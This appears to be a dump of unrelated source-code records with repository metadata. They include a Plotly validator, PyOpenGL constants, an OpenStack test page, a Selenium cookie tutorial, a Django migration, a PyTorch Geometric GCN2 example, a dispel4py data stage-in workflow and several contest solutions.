4404bd2de276bf325541d1d7e6eedbd11d469731 | d41d18d3ea6edd2ec478b500386375a8693f1392 | /plotly/validators/parcoords/_labelfont.py | 0071e780aa370bfd67d410d8abb3787b40b3ce5f | [
"MIT"
] | permissive | miladrux/plotly.py | 38921dd6618650d03be9891d6078e771ffccc99a | dbb79e43e2cc6c5762251537d24bad1dab930fff | refs/heads/master | 2020-03-27T01:46:57.497871 | 2018-08-20T22:37:38 | 2018-08-20T22:37:38 | 145,742,203 | 1 | 0 | MIT | 2018-08-22T17:37:07 | 2018-08-22T17:37:07 | null | UTF-8 | Python | false | false | 1,404 | py | import _plotly_utils.basevalidators
class LabelfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name='labelfont', parent_name='parcoords', **kwargs
):
super(LabelfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str='Labelfont',
data_docs="""
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include *Arial*,
*Balto*, *Courier New*, *Droid Sans*,, *Droid
Serif*, *Droid Sans Mono*, *Gravitas One*, *Old
Standard TT*, *Open Sans*, *Overpass*, *PT Sans
Narrow*, *Raleway*, *Times New Roman*.
size
""",
**kwargs
)
| [
"adam.kulidjian@gmail.com"
] | adam.kulidjian@gmail.com |
21b3fee356fb5ab145b84d2004d1ad7fcd8e7084 | 5e84763c16bd6e6ef06cf7a129bb4bd29dd61ec5 | /blimgui/dist/OpenGL/raw/GLES2/DMP/program_binary.py | 0b25e6095d1a0667f2ba60eac77ec7424b8d7956 | [
"MIT"
] | permissive | juso40/bl2sdk_Mods | 8422a37ca9c2c2bbf231a2399cbcb84379b7e848 | 29f79c41cfb49ea5b1dd1bec559795727e868558 | refs/heads/master | 2023-08-15T02:28:38.142874 | 2023-07-22T21:48:01 | 2023-07-22T21:48:01 | 188,486,371 | 42 | 110 | MIT | 2022-11-20T09:47:56 | 2019-05-24T20:55:10 | Python | UTF-8 | Python | false | false | 727 | py | '''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES2 import _types as _cs
# End users want this...
from OpenGL.raw.GLES2._types import *
from OpenGL.raw.GLES2 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES2_DMP_program_binary'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_DMP_program_binary',error_checker=_errors._error_checker)
GL_DMP_PROGRAM_BINARY_DMP=_C('GL_DMP_PROGRAM_BINARY_DMP',0x9253)
GL_SMAPHS30_PROGRAM_BINARY_DMP=_C('GL_SMAPHS30_PROGRAM_BINARY_DMP',0x9251)
GL_SMAPHS_PROGRAM_BINARY_DMP=_C('GL_SMAPHS_PROGRAM_BINARY_DMP',0x9252)
| [
"justin.sostmann@googlemail.com"
] | justin.sostmann@googlemail.com |
13824e5db65b787a297ff8e433c656e2564c8486 | ac42f1d918bdbd229968cea0954ed75250acd55c | /admin/dashboard/openstack_dashboard/test/integration_tests/pages/identity/projectspage.py | b2821020f8449b27d7e86f8c037a8f0a2716dcf4 | [
"Apache-2.0"
] | permissive | naanal/product | 016e18fd2f35608a0d8b8e5d2f75b653bac7111a | bbaa4cd60d4f2cdda6ce4ba3d36312c1757deac7 | refs/heads/master | 2020-04-03T22:40:48.712243 | 2016-11-15T11:22:00 | 2016-11-15T11:22:00 | 57,004,514 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,876 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from openstack_dashboard.test.integration_tests.pages import basepage
from openstack_dashboard.test.integration_tests.regions import forms
from openstack_dashboard.test.integration_tests.regions import tables
class ProjectsTable(tables.TableRegion):
name = 'tenants'
CREATE_PROJECT_FORM_FIELDS = (("name", "description", "enabled"),)
@tables.bind_table_action('create')
def create_project(self, create_button):
create_button.click()
return forms.TabbedFormRegion(
self.driver, self.conf,
field_mappings=self.CREATE_PROJECT_FORM_FIELDS)
@tables.bind_table_action('delete')
def delete_project(self, delete_button):
delete_button.click()
return forms.BaseFormRegion(self.driver, self.conf, None)
class ProjectsPage(basepage.BaseNavigationPage):
DEFAULT_ENABLED = True
PROJECTS_TABLE_NAME_COLUMN = 'name'
PROJECT_ID_TABLE_NAME_COLUMN = 'id'
def __init__(self, driver, conf):
super(ProjectsPage, self).__init__(driver, conf)
self._page_title = "Projects"
@property
def projects_table(self):
return ProjectsTable(self.driver, self.conf)
def _get_row_with_project_name(self, name):
return self.projects_table.get_row(self.PROJECTS_TABLE_NAME_COLUMN,
name)
def create_project(self, project_name, description=None,
is_enabled=DEFAULT_ENABLED):
create_project_form = self.projects_table.create_project()
create_project_form.name.text = project_name
if description is not None:
create_project_form.description.text = description
if not is_enabled:
create_project_form.enabled.unmark()
create_project_form.submit()
def delete_project(self, project_name):
row = self._get_row_with_project_name(project_name)
row.mark()
modal_confirmation_form = self.projects_table.delete_project()
modal_confirmation_form.submit()
def is_project_present(self, project_name):
return bool(self._get_row_with_project_name(project_name))
def get_project_id_from_row(self, name):
row = self._get_row_with_project_name(name)
return row.cells[self.PROJECT_ID_TABLE_NAME_COLUMN].text
| [
"rajagopalx@gmail.com"
] | rajagopalx@gmail.com |
b52e15cdb511e310d4d1e83f61679dfc82dd7170 | c52a0caadda820b7bdb506cfb8820310ba96027b | /Python网络爬虫基础与实战教程/13_selenium详解/12_cookies.py | 48cff2b82b0391920a6754126a23c6ca3b508e25 | [] | no_license | liangjinhao/Web_Spider_Practice_Code | 1d29939013358889226ce2be61c9d2dc4ec51bd2 | dda804ba4f4f32cf4325d56900556525ffaa9600 | refs/heads/master | 2020-04-23T19:10:43.853205 | 2018-07-14T12:39:35 | 2018-07-14T12:39:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | # !/usr/bin/env python
# -*- coding:utf-8 -*-
# author: Fangyang time:2017/12/18
from selenium import webdriver
browser = webdriver.Chrome()
browser.get('https://www.zhihu.com/explore')
print(browser.get_cookies())
browser.add_cookie({'name':'name','domain':'www.zhihu.com','value':'germey'})
print(browser.get_cookies())
browser.delete_all_cookies()
print(browser.get_cookies()) | [
"fangyang.jing@hotmail.com"
] | fangyang.jing@hotmail.com |
6198fa221a84d22f9942ff988ccd09cd61fcbc2e | 06f0ae3ecaaf47b1c23e231838afa524d8446f5e | /lobby/migrations/0002_contestbanner_promotionbanner.py | 763a0cde3147cff22c6b1eb20d6cfed4268a5ba5 | [] | no_license | nakamotohideyoshi/draftboard-web | c20a2a978add93268617b4547654b89eda11abfd | 4796fa9d88b56f80def011e2b043ce595bfce8c4 | refs/heads/master | 2022-12-15T06:18:24.926893 | 2017-09-17T12:40:03 | 2017-09-17T12:40:03 | 224,877,650 | 0 | 0 | null | 2022-12-08T00:02:57 | 2019-11-29T15:20:17 | Python | UTF-8 | Python | false | false | 2,784 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('contest', '0002_contest_currentcontest_entry_historycontest_livecontest_lobbycontest_upcomingcontest'),
('lobby', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ContestBanner',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('internal_description', models.CharField(max_length=2048, default='', help_text='PRIVATE description of what this banner is for. should not displayed on the front end')),
('start_time', models.DateTimeField(help_text='do not display the banner before the start time')),
('end_time', models.DateTimeField(help_text='all good things must come to an end. and you need to specify the time when this banner should no longer be displayed.')),
('image_url', models.URLField(null=True, help_text='a public link to the image for this banner')),
('links_to', models.URLField(null=True, help_text='if you want the banner to be clickable, then you should add a link here')),
('contest', models.ForeignKey(to='contest.Contest')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='PromotionBanner',
fields=[
('id', models.AutoField(primary_key=True, serialize=False, auto_created=True, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('internal_description', models.CharField(max_length=2048, default='', help_text='PRIVATE description of what this banner is for. should not displayed on the front end')),
('start_time', models.DateTimeField(help_text='do not display the banner before the start time')),
('end_time', models.DateTimeField(help_text='all good things must come to an end. and you need to specify the time when this banner should no longer be displayed.')),
('image_url', models.URLField(null=True, help_text='a public link to the image for this banner')),
('links_to', models.URLField(null=True, help_text='if you want the banner to be clickable, then you should add a link here')),
],
options={
'abstract': False,
},
),
]
| [
"cbanister@coderden.com"
] | cbanister@coderden.com |
fb9fd0867506e770a516bef3dadb36b1c421312d | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_201/1830.py | 2f0e9516d36c5abe37be6a6931f4c8761a1f70dd | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,980 | py | #!/usr/bin/env python
from __future__ import absolute_import
import sys
import unittest
from StringIO import StringIO
sample_in = \
"""
5
4 2
5 2
6 2
1000 1000
1000 1
"""[1:]
sample_out = \
"""
Case #1: 1 0
Case #2: 1 0
Case #3: 1 1
Case #4: 0 0
Case #5: 500 499
"""[1:]
def run(in_buf=sys.stdin, out_buf=sys.stdout):
cases = int(in_buf.readline())
for c in xrange(1, cases+1):
out_buf.write("Case #%s: " % c)
N,K = [int(s) for s in in_buf.readline().split(" ")]
max_min = 0
max_max = 0
stalls = [0]*N
deltas = []
for j in xrange(N):
deltas.append([0, 0])
for i in xrange(K):
l = 0
r = 0
for j in xrange(N):
if not stalls[j]:
deltas[j][0] = l
l += 1
else:
l = 0
if not stalls[-(j+1)]:
deltas[-(j+1)][1] = r
r += 1
else:
r = 0
dist = [[ind, min(m), max(m)] for ind, m in enumerate(deltas) if not stalls[ind]]
max_min = max([x[1] for x in dist])
dist = [d for d in dist if d[1] == max_min]
if len(dist) > 1:
max_max = max([x[2] for x in dist])
dist = [d for d in dist if d[2] == max_max]
elif not len(dist):
print "FAIL"
max_min = dist[0][1]
max_max = dist[0][2]
pos = dist[0][0]
stalls[pos] = 1
out_buf.write("{} {}\n".format(max_max, max_min))
class Case2017QC(unittest.TestCase):
def test_run(self):
for i in xrange(20):
sample_in_buf = StringIO(sample_in)
output = StringIO()
run(sample_in_buf, output)
self.assertSequenceEqual(sample_out.splitlines(), output.getvalue().splitlines())
if __name__ == '__main__':
run()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
6375c702b93fc71da45a77ff44b3349477fc0279 | e0045eec29aab56212c00f9293a21eb3b4b9fe53 | /base_import_module/tests/test_module/__manifest__.py | 260330237ca86dcd58e9202e77e1189a162ad12f | [] | no_license | tamam001/ALWAFI_P1 | a3a9268081b9befc668a5f51c29ce5119434cc21 | 402ea8687c607fbcb5ba762c2020ebc4ee98e705 | refs/heads/master | 2020-05-18T08:16:50.583264 | 2019-04-30T14:43:46 | 2019-04-30T14:43:46 | 184,268,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | # -*- coding: utf-8 -*-
# Part of ALWAFI. See LICENSE file for full copyright and licensing details.
{
'name': 'Test Module',
'category': 'Website',
'summary': 'Custom',
'version': '1.0',
'description': """
Test
""",
'depends': ['website'],
'data': [
'test.xml',
],
'installable': True,
'application': True,
}
| [
"50145400+gilbertp7@users.noreply.github.com"
] | 50145400+gilbertp7@users.noreply.github.com |
bff3a7e8667e7ffb5d025678ec5459419639193c | 8f439e50c741483ffefd5bad16f11d4b60da8fe9 | /examples/gcn2_cora.py | 4a6e2dc914712dafa0e2c6fbfe309024bea5cb3d | [
"MIT"
] | permissive | sumanthratna/pytorch_geometric | 19d66b6cc874fbce9207efc204a0ed1f9bb04d88 | 9c6a069c995cac38e4f3a2f1e9cfc7cebac889c6 | refs/heads/master | 2023-08-29T09:58:33.807755 | 2021-09-08T16:00:09 | 2021-09-08T16:00:09 | 404,423,682 | 2 | 0 | MIT | 2021-09-08T20:58:23 | 2021-09-08T16:44:15 | null | UTF-8 | Python | false | false | 2,928 | py | import os.path as osp
import torch
from torch.nn import Linear
import torch.nn.functional as F
from torch_geometric.datasets import Planetoid
import torch_geometric.transforms as T
from torch_geometric.nn import GCN2Conv
from torch_geometric.nn.conv.gcn_conv import gcn_norm
dataset = 'Cora'
path = osp.join(osp.dirname(osp.realpath(__file__)), '..', 'data', dataset)
transform = T.Compose([T.NormalizeFeatures(), T.ToSparseTensor()])
dataset = Planetoid(path, dataset, transform=transform)
data = dataset[0]
data.adj_t = gcn_norm(data.adj_t) # Pre-process GCN normalization.
class Net(torch.nn.Module):
def __init__(self, hidden_channels, num_layers, alpha, theta,
shared_weights=True, dropout=0.0):
super(Net, self).__init__()
self.lins = torch.nn.ModuleList()
self.lins.append(Linear(dataset.num_features, hidden_channels))
self.lins.append(Linear(hidden_channels, dataset.num_classes))
self.convs = torch.nn.ModuleList()
for layer in range(num_layers):
self.convs.append(
GCN2Conv(hidden_channels, alpha, theta, layer + 1,
shared_weights, normalize=False))
self.dropout = dropout
def forward(self, x, adj_t):
x = F.dropout(x, self.dropout, training=self.training)
x = x_0 = self.lins[0](x).relu()
for conv in self.convs:
x = F.dropout(x, self.dropout, training=self.training)
x = conv(x, x_0, adj_t)
x = x.relu()
x = F.dropout(x, self.dropout, training=self.training)
x = self.lins[1](x)
return x.log_softmax(dim=-1)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
model = Net(hidden_channels=64, num_layers=64, alpha=0.1, theta=0.5,
shared_weights=True, dropout=0.6).to(device)
data = data.to(device)
optimizer = torch.optim.Adam([
dict(params=model.convs.parameters(), weight_decay=0.01),
dict(params=model.lins.parameters(), weight_decay=5e-4)
], lr=0.01)
def train():
model.train()
optimizer.zero_grad()
out = model(data.x, data.adj_t)
loss = F.nll_loss(out[data.train_mask], data.y[data.train_mask])
loss.backward()
optimizer.step()
return float(loss)
@torch.no_grad()
def test():
model.eval()
pred, accs = model(data.x, data.adj_t).argmax(dim=-1), []
for _, mask in data('train_mask', 'val_mask', 'test_mask'):
accs.append(int((pred[mask] == data.y[mask]).sum()) / int(mask.sum()))
return accs
best_val_acc = test_acc = 0
for epoch in range(1, 1001):
loss = train()
train_acc, val_acc, tmp_test_acc = test()
if val_acc > best_val_acc:
best_val_acc = val_acc
test_acc = tmp_test_acc
print(f'Epoch: {epoch:04d}, Loss: {loss:.4f} Train: {train_acc:.4f}, '
f'Val: {val_acc:.4f}, Test: {tmp_test_acc:.4f}, '
f'Final Test: {test_acc:.4f}')
| [
"matthias.fey@tu-dortmund.de"
] | matthias.fey@tu-dortmund.de |
5ab8fe9166c1328be78dd07c6a721ea87a295e3b | 16c251444a3010a88d1e90bb56df46bcb0fe5ea9 | /verce-hpc-pe-new/src/test/misfit_preprocessing/stagein_graph.py | f87a4956c0ec9e41c5d576f79e4baff7e985c75d | [
"MIT"
] | permissive | rosafilgueira/VERCE | b680d708df0e77e2984c29c89a787e30a595991d | a39a6c963fd6f7f5ef5244245b92ee36f6335399 | refs/heads/master | 2020-04-08T05:39:56.857491 | 2018-07-04T14:40:48 | 2018-07-04T14:40:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,204 | py | from dispel4py.workflow_graph import WorkflowGraph
from dispel4py.provenance import *
from dispel4py.seismo.seismo import *
from dispel4py.seismo.obspy_stream import createProcessingComposite, INPUT_NAME, OUTPUT_NAME
from dispel4py.base import SimpleFunctionPE, IterativePE, create_iterative_chain
import json
#from dispel4py.visualisation import *
import os
import sys
from urlparse import urlparse
input_json=json.load(open(os.environ["INPUT_FILE"]))
class ReadJSON(GenericPE):
OUTPUT_NAME='output'
def __init__(self):
GenericPE.__init__(self)
self._add_input('input')
self._add_output('output_raw')
self._add_output('output_syn')
self._add_output('output_xml')
def _process(self, inputs):
self.write('output_raw',inputs['input']['raw_stagein_from'])
self.write('output_syn',inputs['input']['syn_stagein_from'])
self.write('output_xml',inputs['input']['stationxml_stagein_from'])
class StreamMapper(IterativePE):
def __init__(self,rootpah):
IterativePE.__init__(self)
#self._add_input('input')
#self._add_output('output')
self.counter = 0
self.roothpath=rootpah
def _process(self, inputs):
data = inputs
for i in data:
#self.log('FFFFFF: '+str(i))
url=urlparse(i)
self.write('output',[self.roothpath+url.path])
def strToBool(value):
if value=="true":
return True
if value=="false":
return False
return value
def stagein(origins,target,irods,type,rootpath,format='application/octet-stream'):
remote_locations=[]
target_locations_urls=[]
target_locations=[]
for x in origins:
stdoutdata, stderrdata = commandChain([["{}".format("globus-url-copy -cd -r gsiftp://"+irods+"/"+rootpath+'/'+x+" "+target+"/",)]],os.environ.copy())
remote_locations.append("gsiftp://"+irods+"/"+rootpath+'/'+x)
target_locations.append(target+"/"+os.path.basename(x))
target_locations_urls.append("file://"+irods+"/"+x)
prov={'location':target_locations_urls, 'format':format, 'error':stderrdata,'metadata':{'type':type,'source':remote_locations}}
return {'_d4p_prov':prov,'_d4p_data':target_locations}
stagein_raw=[(stagein,{ 'target':os.environ['STAGED_DATA']+'/'+input_json['readJSONstgin'][0]['input']['data_dir'],'irods':os.environ['IRODS_URL'],'type':'data','rootpath':'~/verce/'})
]
stagein_syn=[
(stagein,{ 'target':os.environ['STAGED_DATA']+'/'+input_json['readJSONstgin'][0]['input']['synt_dir'],'irods':os.environ['IRODS_URL'],'type':'synt','rootpath':'~/verce/'})
]
stagein_xml=[
(stagein,{ 'target':os.environ['STAGED_DATA']+'/'+input_json['readJSONstgin'][0]['input']['stations_dir'],'irods':os.environ['IRODS_URL'],'type':'stationxml','format':'application/xml','rootpath':'~/verce/'})
]
graph = WorkflowGraph()
read=ReadJSON()
read.name='readJSONstgin'
streamer0=StreamMapper('')
streamer1=StreamMapper('')
streamer2=StreamMapper('')
syn_staging_pipeline = create_iterative_chain(stagein_syn)
raw_staging_pipeline = create_iterative_chain(stagein_raw)
xml_staging_pipeline = create_iterative_chain(stagein_xml)
graph.connect(read, 'output_syn', streamer0, "input")
graph.connect(read, 'output_raw', streamer1, "input")
graph.connect(read, 'output_xml', streamer2, "input")
graph.connect(streamer0, 'output', syn_staging_pipeline, "input")
graph.connect(streamer1, 'output', raw_staging_pipeline, "input")
graph.connect(streamer2, 'output', xml_staging_pipeline, "input")
#injectProv(graph,ProvenancePE)
#attachProvenanceRecorderPE(graph,ProvenanceRecorderToFileBulk,username=os.environ['USER_NAME'],runId=os.environ['RUN_ID'],w3c_prov=False)
InitiateNewRun(graph,ProvenanceRecorderToFileBulk,username=os.environ['USER_NAME'],runId=input_json['runId'],w3c_prov=False,workflowName="preprocess_stagein",workflowId="")
#display(graph)
| [
"spinuso@knmi.nl"
] | spinuso@knmi.nl |
6d628b9f80717b0facad581feac48833a9dfd404 | f40086079bdcb465da32bfc4c244d0a699a735e3 | /informatics/series 4/Andrianampoinimerina.py | 0fb70d79e09a560f660b3642beb5efc03ad5a42b | [] | no_license | isk02206/python | e6dfc1e219ae3a51bde80fed75412bed98b3defe | b2fc6d1aa1155c0758883677eb2e37d9f92a4382 | refs/heads/master | 2022-12-06T15:14:55.264792 | 2020-09-02T01:02:11 | 2020-09-02T01:02:11 | 292,142,661 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,068 | py | line = int(input())
counter = 0
for i in range(line):
#print(i)
word = str(input())
if i == 0:
n = ord(word.lower()[0])
n_last = ord(word.lower()[-1])
#print(n, n_last)
if n != n_last:
print(word)
break
if i != 0:
n += 1
n_last += 1
if n == 123:
n = ord('a')
if n_last == 123:
n_last = ord('a')
#print(n, n_last)
#print(n, ord(word[0]))
if n != ord(word.lower()[0]):
print(word)
break
if n_last != ord(word.lower()[-1]):
print(word)
break
counter += 1
if counter == line:
print('no mistake')
# print(word.capitalize())
#print(n)
#print(word)
#print(word)
#convert_ord = ord(word[0])
#print(word)
#print(convert_ord)
#if s != j:
#print(word.capitalize())
#if ord(word[0]) + 1 != :
#print(word.capitalize())
#print(convert_ord)
#if word[0] != word[-1]:
#print(word.capitalize())
| [
"67949037+isk02206@users.noreply.github.com"
] | 67949037+isk02206@users.noreply.github.com |
213ff08fae05c42185868d94f5c1e285d33ba969 | 3fc49cac255c54c6512c2b60c4fe097b9d383f55 | /cube110.v3/libs/data_shelve.py | 66d490c7f28fd3e50fbfe16b6d188279d14fc25a | [] | no_license | zaswed76/all_cubes110_resorce | c029a16117866dd468b93ffb1cfdb66dd3612f1b | 79ff65fdd04b70bddd83128c8e7d1096f7235b31 | refs/heads/master | 2021-01-10T01:43:14.379636 | 2015-12-18T17:10:49 | 2015-12-18T17:11:05 | 48,290,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shelve
import paths
# from libs.image_geometry import ImageGeometry
#
# if __name__ == '__main__':
# data_path = os.path.join(paths.root,
# r"data\cls_shl\secondary_geometry_shl")
#
#
# geometry_img = {}
# data = shelve.open(data_path)
# geometry_img["0"] = data["0"]
#
# # изменяем
# print(geometry_img["0"].x)
# geometry_img["0"].x = 45.0
#
# # сохраняем
# data["0"] = geometry_img["0"]
# print(data["0"].x)
class Shl(dict):
def __init__(self, data_path):
super().__init__()
self.data_path = data_path
self.data = None
def load(self):
self.data = shelve.open(self.data_path)
self.update(self.data)
def save(self, name):
self.data[name] = self[name]
self.data.sync()
def __setitem__(self, key, value):
print("!!")
dict.__setitem__(self, key, value)
data_path = os.path.join(paths.root,
r"data\cls_shl\secondary_geometry_shl")
s = Shl(data_path)
s.load()
print(s["0"].x )
s["0"].x = 33.3
s.save("0")
| [
"zaswed76@gmail.com"
] | zaswed76@gmail.com |
a29d0f8460dc4e59b8bbf575268a9682fa68df88 | 3a0900611a7127e74d08cb9e5e2589ac3cde9114 | /dbtest.py | 293a1aec60c8c4d3a080d899501a5a7613b0e2f5 | [
"Apache-2.0"
] | permissive | dpshorten/EC14-main | c3c83dce1be9974cc2e3a6c8f48df91e24dfbfdd | 43a62617d21f5010702c025d5538814dfb624e6c | refs/heads/master | 2021-01-15T18:26:13.698527 | 2015-01-16T20:42:48 | 2015-01-16T20:42:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,993 | py | from db import DB
db = DB("ec141:ec141@192.168.0.44/ec141", "test", 100, 50)
db.dropTables()
db.createTables()
# quit()
print(1)
id1 = db.createIndividual(1,2,3)
id2 = db.createIndividual(2,3,4)
id3 = db.createIndividual(3,4,5)
id4 = db.createIndividual(0,1,2)
id5 = db.createIndividual(0,1,1)
print(2)
print("id:"+str(id1))
indiv = db.getIndividual(id3)
print(3)
print(indiv)
traces = db.getTraces(id3)
print(4)
print(traces)
toHN = db.getHNtodos()
print(5)
print(toHN)
db.markAsHyperneated(toHN[0])
toHN = db.getHNtodos()
print(7)
print(toHN)
toVox = db.getVoxTodos()
print(8)
print(toVox)
indiv1 = db.makeFakeBaby(1)
indiv2 = db.makeFakeBaby(1,2)
print(9)
parents0 = db.getParents(1)
parents1 = db.getParents(indiv1)
parents2 = db.getParents(indiv2)
print(10)
print(parents0)
print(parents1)
print(parents2)
todos = [indiv1, indiv2]
for todo in todos:
id = todo
print("PP: looking for mates for individual {indiv}...".format(indiv=id))
mates = db.findMate(id, 5, 10)
i = 0
while (len(mates) != 0):
i+=1
mate = mates[0]
parent2 = {}
parent2["id"] = mate["mate_id"]
parent2["indiv_id"] = mate["mate_indiv_id"]
parent2["ltime"] = mate["mate_ltime"]
parent2["x"] = mate["mate_x"]
parent2["y"] = mate["mate_y"]
parent2["z"] = mate["mate_z"]
db.makeBaby(mate, parent2, mate["ltime"], 2)
newStart = mate["id"]
mates = db.findMate(id, 5, 10, newStart)
print("PP: found {len} mating occurances for individual {indiv}".format(len=i, indiv=id))
db.flush()
print(11)
db.addJob("123456", "qsub dqwpdjwpd -qdqwdq {} qdwqwd $! qwodjq")
db.addJob("123457", "qsub dqoiwdj [];.,<>\'")
db.addJob("123457", "qsub job3 blabli", ["20","21","22"])
openjobs = db.getJobsWaitingCount()
print(openjobs)
print(12)
db.setJobDone("22")
openjobs = db.getJobsWaitingCount()
print(openjobs)
print(13)
unfinished = db.getUnfinishedIndividuals()
print(unfinished)
print(14)
print("done")
| [
"fgolemo@gmail.com"
] | fgolemo@gmail.com |
ab5418c96cbee9740bff5f0d0b71eef02f8d6620 | 56f5b2ea36a2258b8ca21e2a3af9a5c7a9df3c6e | /CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467489/HTT_24Jul_newTES_manzoni_Up_Jobs/Job_3/run_cfg.py | 90591f7bc9bd3eecf40cc3883c9708618391825f | [] | no_license | rmanzoni/HTT | 18e6b583f04c0a6ca10142d9da3dd4c850cddabc | a03b227073b2d4d8a2abe95367c014694588bf98 | refs/heads/master | 2016-09-06T05:55:52.602604 | 2014-02-20T16:35:34 | 2014-02-20T16:35:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,516 | py | import FWCore.ParameterSet.Config as cms
import os,sys
sys.path.append('/afs/cern.ch/user/m/manzoni/summer13/CMGTools/CMSSW_5_3_9/src/CMGTools/H2TauTau/prod/25aug_corrMC/up/mc/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0_1377467489/HTT_24Jul_newTES_manzoni_Up_Jobs')
from base_cfg import *
process.source = cms.Source("PoolSource",
noEventSort = cms.untracked.bool(True),
inputCommands = cms.untracked.vstring('keep *',
'drop cmgStructuredPFJets_cmgStructuredPFJetSel__PAT'),
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring('/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_1_2_D3K.root',
'/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_20_1_Eqr.root',
'/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_21_1_u5G.root',
'/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_2_1_wAR.root',
'/store/cmst3/group/cmgtools/CMG/WH_ZH_TTH_HToTauTau_M-155_8TeV-pythia6-tauola/Summer12_DR53X-PU_S10_START53_V7A-v1/AODSIM/PAT_CMG_V5_16_0/cmgTuple_3_1_uWh.root')
)
| [
"riccardo.manzoni@cern.ch"
] | riccardo.manzoni@cern.ch |
16ee7d3f51d71bb65d77726919199c6b25557acc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03291/s401672893.py | 0de631d5255eb668a211bf827e142379be3333c5 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,028 | py | #!/usr/bin/env python3
import sys
MOD = 1000000007 # type: int
def solve(S: str):
dp = [[0 for j in range(4)] for i in range(len(S) + 1)]
STR = "XABC"
dp[0][0] = 1
for i in range(len(S)):
c = S[i]
for j in range(4):
next = dp[i][j]
if c == "?":
next *= 3
if j > 0:
next += dp[i][j-1]
if STR[j] == c: # 選んだ文字列が次選ぶべき文字列だったら
next += dp[i][j-1]
dp[i+1][j] = next % MOD
# print(dp)
print(dp[len(S)][3])
return
# Generated by 1.1.4 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)
def main():
def iterate_tokens():
for line in sys.stdin:
for word in line.split():
yield word
tokens = iterate_tokens()
S = next(tokens) # type: str
solve(S)
if __name__ == '__main__':
main()
| [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
